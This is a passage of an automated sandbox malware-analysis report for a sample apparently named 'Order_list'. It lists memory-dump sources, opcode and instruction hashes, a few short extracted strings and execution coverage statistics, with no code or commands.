                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e891b1f0d32e2e8c1e6996de439f5c946f2a057ad5b1fe9d913c973672098a57
                                                                                                                            • Instruction ID: ca9a77a7c90be2af1b10f7dbbb3bcffa94f4c78619c6d9fa138bd42b32deee59
                                                                                                                            • Opcode Fuzzy Hash: e891b1f0d32e2e8c1e6996de439f5c946f2a057ad5b1fe9d913c973672098a57
                                                                                                                            • Instruction Fuzzy Hash: C0E02234D19204CECB14CEACB8082FABBB1EBCA300F006829D41163191DBB4521D9B51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 75cb47a5a83291066bc6af30dccdf25ec5f838c275c3ac7859b5f8c737bd9fc5
                                                                                                                            • Instruction ID: 2b7e6337c6f52a64a3b9597f58a7bd6cdeb9dade5974aad9da0f76f0f34c653d
                                                                                                                            • Opcode Fuzzy Hash: 75cb47a5a83291066bc6af30dccdf25ec5f838c275c3ac7859b5f8c737bd9fc5
                                                                                                                            • Instruction Fuzzy Hash: BCE0DFA3D0A1409BE3208FFAAC260F9BF30DDE326174468D7D0898B129E614E2069B11
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2633ed67f803fd62a436ba6e49102108a84755e8a10ae0d06dad696f85be6a4b
                                                                                                                            • Instruction ID: 4fe652a19dafbbb636a031e2982217baff8a21721d3f39a25e0ef4ea88008e06
                                                                                                                            • Opcode Fuzzy Hash: 2633ed67f803fd62a436ba6e49102108a84755e8a10ae0d06dad696f85be6a4b
                                                                                                                            • Instruction Fuzzy Hash: 02E08631D1536F52CB01DBB1AD047EEBB78EFD6614F44565ADC6433041EB70269AC3A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d0690742fb15a34a05d079fc499fffff5eec5eee0c39cb5bf90786b758ac6d6
                                                                                                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                            • Opcode Fuzzy Hash: 5d0690742fb15a34a05d079fc499fffff5eec5eee0c39cb5bf90786b758ac6d6
                                                                                                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                            • Instruction ID: ae0264afbfbb26cbc8d6aea75ac788c78dcc79b1633dc78be78aefeb4ce90d2a
                                                                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                            • Instruction Fuzzy Hash: E3C08C3320C2282AA635108F7C48EB3BB8CC3C13F5B250137FA2CE3300A8429C8101F8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7ee883222a86ee971c2555860577fd8be8f5fb2b30d016aa89c6a2aae696e0a5
                                                                                                                            • Instruction ID: 1f6137dae96432406884fe331ed262264a2f0711513cc89c99bda431e02602ba
                                                                                                                            • Opcode Fuzzy Hash: 7ee883222a86ee971c2555860577fd8be8f5fb2b30d016aa89c6a2aae696e0a5
                                                                                                                            • Instruction Fuzzy Hash: C2D0173AB00008DFCB108F8CEC808DDB7B6FB9C221B008016E911A3260C6319821CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: eb742babaca1580afc817662cb64bbe8f7a37a91e3f91e50a61ce4a055810346
                                                                                                                            • Instruction ID: 1efa97894128681efc2ae993f0198e5beb1ff61caac02509c4a11cae5d418e62
                                                                                                                            • Opcode Fuzzy Hash: eb742babaca1580afc817662cb64bbe8f7a37a91e3f91e50a61ce4a055810346
                                                                                                                            • Instruction Fuzzy Hash: A9D0C2306083434FC302E734EA99414BB39BAC0204B4044A6A8040E12AEE7848498B52
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3549125a45b0e869a1000270728a469a6cd3967010daf8f50b61479657dda5d7
                                                                                                                            • Instruction ID: 60b07e67140d2f35d9815478c201ea5918169cfc62b9b198e8efa7030f5e722f
                                                                                                                            • Opcode Fuzzy Hash: 3549125a45b0e869a1000270728a469a6cd3967010daf8f50b61479657dda5d7
                                                                                                                            • Instruction Fuzzy Hash: F7C0123024430B4FC641E779FE89555B72EF6D0200F405521A4090A229EF785C888B91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: "$0oAp$Hbq$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                                            • API String ID: 0-2279143882
                                                                                                                            • Opcode ID: 48707e7d639a04d0d613a98a2c61712794aa715f08951c3924cf99bbff9084e7
                                                                                                                            • Instruction ID: e07f45a5db7a409e72935d4cddc60ec5a499fead37433f239f4a1992184a4e35
                                                                                                                            • Opcode Fuzzy Hash: 48707e7d639a04d0d613a98a2c61712794aa715f08951c3924cf99bbff9084e7
                                                                                                                            • Instruction Fuzzy Hash: F812C074E002188FDB68DF69C994B9DBBF2BF89300F1085A9D409AB365DB759E85CF10
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .5vq
                                                                                                                            • API String ID: 0-493797296
                                                                                                                            • Opcode ID: 75f2e256fdf39800780adfce00f07a287ce6292ab3ff9f8fe957b1f15aed53c2
                                                                                                                            • Instruction ID: 4221276a88a2e74c9953cd5ec33e4584926d78814edf917d20b846307ff19f4c
                                                                                                                            • Opcode Fuzzy Hash: 75f2e256fdf39800780adfce00f07a287ce6292ab3ff9f8fe957b1f15aed53c2
                                                                                                                            • Instruction Fuzzy Hash: 28527B74E01229CFDB64DF69C984BADBBB2BB89300F1085EAD409A7354DB359E85CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp
                                                                                                                            • API String ID: 0-730047704
                                                                                                                            • Opcode ID: 1addd7aef08b7254c47bae6d9ccd99948371c051c43f0fc6b4c9893bf80d6fe4
                                                                                                                            • Instruction ID: 016fe08bf8ca4f3ff2a4dcf4861dda80a4df4bf0f45baecf37d3ad865c3d4a40
                                                                                                                            • Opcode Fuzzy Hash: 1addd7aef08b7254c47bae6d9ccd99948371c051c43f0fc6b4c9893bf80d6fe4
                                                                                                                            • Instruction Fuzzy Hash: 36B1B574E00218CFDB54DFA9D984A9DBBB2FF89310F1081A9D819AB365DB35AD45CF40
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oAp
                                                                                                                            • API String ID: 0-730047704
                                                                                                                            • Opcode ID: bcb120fee13aa21014a3cfcfe0f064c834bf78f9e763ca95cfb2e8feb5ee1bce
                                                                                                                            • Instruction ID: 3721b881a0d6d7efc83eeda6a7efadb03d7902d4a1dccd5a6029c6aff3c8d15b
                                                                                                                            • Opcode Fuzzy Hash: bcb120fee13aa21014a3cfcfe0f064c834bf78f9e763ca95cfb2e8feb5ee1bce
                                                                                                                            • Instruction Fuzzy Hash: 3451C375E01608CFDB48DFAAD984A9DBBF2FF89310F14916AD419AB364DB349942CF10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e82134de72852419b79be91a03e5113fc6876f41d03b2d503cc62d3487421ed9
                                                                                                                            • Instruction ID: 10bdcd300f043d27624c761792d2711450094085f25bc8fba0c5bff3df7f840e
                                                                                                                            • Opcode Fuzzy Hash: e82134de72852419b79be91a03e5113fc6876f41d03b2d503cc62d3487421ed9
                                                                                                                            • Instruction Fuzzy Hash: 5BC1A074E00218CFDB54DFA9D984BADBBB2BF88304F2091A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 235c16276a253fc0c84d3aeadeb2dceb54b7da895228688e3c12da2da62c2bba
                                                                                                                            • Instruction ID: bf65512f5c980c4fb3917d02f5eb1cdac43d04ab8324f691ece6cafcfca23ad9
                                                                                                                            • Opcode Fuzzy Hash: 235c16276a253fc0c84d3aeadeb2dceb54b7da895228688e3c12da2da62c2bba
                                                                                                                            • Instruction Fuzzy Hash: B5C1A275E00218CFDB54DFA9D994B9DBBB2BF88304F1081A9D809AB354DB359D85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8436fe9d052a7f64b988d3e97b5513927575639cd55367e2ce5b94778135cd4f
                                                                                                                            • Instruction ID: b51e14ef28f0cbbbc46bd22c34577f1d756584da2a42bc7df0a38a362ba85958
                                                                                                                            • Opcode Fuzzy Hash: 8436fe9d052a7f64b988d3e97b5513927575639cd55367e2ce5b94778135cd4f
                                                                                                                            • Instruction Fuzzy Hash: B6C19F74E00218CFDB54DFA9D984B9DBBB2BF88304F2081A9D809AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 8b755083b38cfbfd7be1ab709f6626699c8a7351898ea41664b416bf04b91b0f
                                                                                                                            • Instruction ID: 0574257179b838abfcce10504e1cd66f67b485bc961fca35759bda925184db24
                                                                                                                            • Opcode Fuzzy Hash: 8b755083b38cfbfd7be1ab709f6626699c8a7351898ea41664b416bf04b91b0f
                                                                                                                            • Instruction Fuzzy Hash: DEC1A074E01218CFDB54DFA9D984BADBBB2BF88304F2091A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 29643220191c075bd6128a00bf94da5dd9313f1c91891cdafb9eea8570afb6bd
                                                                                                                            • Instruction ID: 6c2b221db7000169a756142d52b5d8c97ff6ad6f33cd9b2275bea7f6a9626f7f
                                                                                                                            • Opcode Fuzzy Hash: 29643220191c075bd6128a00bf94da5dd9313f1c91891cdafb9eea8570afb6bd
                                                                                                                            • Instruction Fuzzy Hash: DBC19F75E00218CFDB54DFA9D984BADBBB2FB88304F2091A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 95a5c7fb98e4a715487b98feed1f52d4fabd2c7ed70ee48ca6d70f866c9647cb
                                                                                                                            • Instruction ID: 6ef35b98a6c076e6266a59ee19b4ba08df4fddb50272943d29244030830f0b57
                                                                                                                            • Opcode Fuzzy Hash: 95a5c7fb98e4a715487b98feed1f52d4fabd2c7ed70ee48ca6d70f866c9647cb
                                                                                                                            • Instruction Fuzzy Hash: C4C1A074E01218CFDB54DFA9D984BADBBB2BF88304F2091A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 41e66a4f04f4a5338b7ae7bec5132a12c42787e7937bc8d00556f7819e59f4f2
                                                                                                                            • Instruction ID: 91acd7702bd37ceb0f33b58fb48932a301495e32e9f68de6917a74c7861c9214
                                                                                                                            • Opcode Fuzzy Hash: 41e66a4f04f4a5338b7ae7bec5132a12c42787e7937bc8d00556f7819e59f4f2
                                                                                                                            • Instruction Fuzzy Hash: BBC1A174E01218CFDB54DFA9D984BADBBB2BF88304F2091A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d0b3222339091383088aebfb832d09212a12bb0907fe7ec70cb05b46dbd03725
                                                                                                                            • Instruction ID: 0f7d5eeb631f57f5d031c04ab30cfda84115a34f9cf7660d7d1fa44a2552d714
                                                                                                                            • Opcode Fuzzy Hash: d0b3222339091383088aebfb832d09212a12bb0907fe7ec70cb05b46dbd03725
                                                                                                                            • Instruction Fuzzy Hash: 18C19F75E00218CFDB54DFA9D984B9DBBB2EF88304F2081A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 91274e26f7543ea035fa49e275ee7518078631b8ed678bec87a1d93c208a4fc2
                                                                                                                            • Instruction ID: 2da16a6d2e6b871cc8e0ea9d9deb4af7042f10b9b8045455ca919bbe9a1a1ad0
                                                                                                                            • Opcode Fuzzy Hash: 91274e26f7543ea035fa49e275ee7518078631b8ed678bec87a1d93c208a4fc2
                                                                                                                            • Instruction Fuzzy Hash: FDC1B174E00218CFDB54DFA9D984B9DBBB2BF88304F2091A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f694ea4b6160bd895cb7834b2a588309167764a1bd5f6eb78b05d55682c7858c
                                                                                                                            • Instruction ID: 3b1f611aedf589d20cd688c857438ce3b050af73fd9b8cd30b05f28995359c21
                                                                                                                            • Opcode Fuzzy Hash: f694ea4b6160bd895cb7834b2a588309167764a1bd5f6eb78b05d55682c7858c
                                                                                                                            • Instruction Fuzzy Hash: 0DC1A075E00218CFDB54DFA9D984BADBBB2BF88304F2481A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c075d9513af4a95ff7a88c174f280aec478a5c76af81f40b9cbb6fc0b1d1a0f5
                                                                                                                            • Instruction ID: 1bc8df484ed3b6cb6977b18471ffe8e39df14320639d95eebc15a133166f618b
                                                                                                                            • Opcode Fuzzy Hash: c075d9513af4a95ff7a88c174f280aec478a5c76af81f40b9cbb6fc0b1d1a0f5
                                                                                                                            • Instruction Fuzzy Hash: 27C1AF75E00218CFDB54DFA9D984BADBBB2BF88304F2091A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 473e0826998656e607aa6243adbd5d0a89f6f66007bbd2fef68767c23c42e16f
                                                                                                                            • Instruction ID: fae62861879e5c3d552943746ff64360e5a8125888a8fd5857ee0cd90b077ece
                                                                                                                            • Opcode Fuzzy Hash: 473e0826998656e607aa6243adbd5d0a89f6f66007bbd2fef68767c23c42e16f
                                                                                                                            • Instruction Fuzzy Hash: A4C1A174E00218CFDB54DFA9D984BADBBB2BF88304F2491A9D409AB354DB359D85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 87d5c0dfd1185a207ad2f2fedf593b8df0b3acb38376cb6b636eb5fafa3a4887
                                                                                                                            • Instruction ID: cbef5d08aeec41c1e2a48a09144dc846cc02f2d95ef9f66ca1e00166deb389f6
                                                                                                                            • Opcode Fuzzy Hash: 87d5c0dfd1185a207ad2f2fedf593b8df0b3acb38376cb6b636eb5fafa3a4887
                                                                                                                            • Instruction Fuzzy Hash: 2BC1A075E00218CFDB54DFA9D984BADBBB2BF88304F2081A9D409AB355DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a83bff1e2052ea216d834250dc16dfbecb219b9ff0813ad46bffb7c0cb4bac68
                                                                                                                            • Instruction ID: acab3fd7a86ab54ccbce1658a98c2187f6852e9449342c1cada217d421fbf33c
                                                                                                                            • Opcode Fuzzy Hash: a83bff1e2052ea216d834250dc16dfbecb219b9ff0813ad46bffb7c0cb4bac68
                                                                                                                            • Instruction Fuzzy Hash: 28C1A074E00218CFDB54DFA9D984B9DBBB2BF88304F2081A9D409AB355DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 279d1c989ae7ee84f1b999bad98a7ab57ce37ac406d98929c8776bef31544df6
                                                                                                                            • Instruction ID: 9061c5ba9732161dfd5cab81393bd33d699b2720540390a14269bbb21e07cebf
                                                                                                                            • Opcode Fuzzy Hash: 279d1c989ae7ee84f1b999bad98a7ab57ce37ac406d98929c8776bef31544df6
                                                                                                                            • Instruction Fuzzy Hash: 34C1A174E00218CFDB54DFA9D984B9DBBB2BF88304F2081A9D409AB354DB359E85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2ab2a7810a694bdf934f1f393e1a461c29a994d780cefd1e6654e504a604f63f
                                                                                                                            • Instruction ID: 19dc4fcf37868d1d599bc57491772e85dabb4373f7b3de7eceefc6c24615e2c1
                                                                                                                            • Opcode Fuzzy Hash: 2ab2a7810a694bdf934f1f393e1a461c29a994d780cefd1e6654e504a604f63f
                                                                                                                            • Instruction Fuzzy Hash: 02D06735D4425D8ACB10EF989D407AEB772FF96204F0025A68508B7250D7309E508A16
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5$Hbq$$^q$$^q
                                                                                                                            • API String ID: 0-673592099
                                                                                                                            • Opcode ID: 10c6e306c676732bda1f6ea193d29b9882c2ccb65898915725d8565d33c4b6b8
                                                                                                                            • Instruction ID: db3a3f108d21437e0c797cc22c7ee4615bd99894433e02ece86fe73a6b1b6829
                                                                                                                            • Opcode Fuzzy Hash: 10c6e306c676732bda1f6ea193d29b9882c2ccb65898915725d8565d33c4b6b8
                                                                                                                            • Instruction Fuzzy Hash: D571AE727001118BDB18ABBDDC9867E3BABAFC465171C486AE606CB3A5DF34CC429794
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                                                            • API String ID: 0-2732225958
                                                                                                                            • Opcode ID: 6bad7781f011916781a1afba7447dfca2331d3d5b039a38513316b55023222f2
                                                                                                                            • Instruction ID: 75e2f0a9a1d256886ebfc5138cf044d97a7b71ed64b79d342d3595b4be12b18a
                                                                                                                            • Opcode Fuzzy Hash: 6bad7781f011916781a1afba7447dfca2331d3d5b039a38513316b55023222f2
                                                                                                                            • Instruction Fuzzy Hash: CB71F431E042198FCF65DFA8CD503AEBBF6BF88300F108569D515A3355EB308A85CB92
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                            • API String ID: 0-3001612457
                                                                                                                            • Opcode ID: 44e2563b02c8e4de314d6929ca90b5593db60a381842011b4482a063b6f05b3e
                                                                                                                            • Instruction ID: fa6c620f0575ba1f2d0214a9ac2fda477601de72a074c7c8e9053ff97fa54eb0
                                                                                                                            • Opcode Fuzzy Hash: 44e2563b02c8e4de314d6929ca90b5593db60a381842011b4482a063b6f05b3e
                                                                                                                            • Instruction Fuzzy Hash: 8401D4317009149FEB268E3CCA4492577FBAF88A60325417AE102CF3B4DB72DC46C790

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:90
                                                                                                                            Total number of Limit Nodes:4
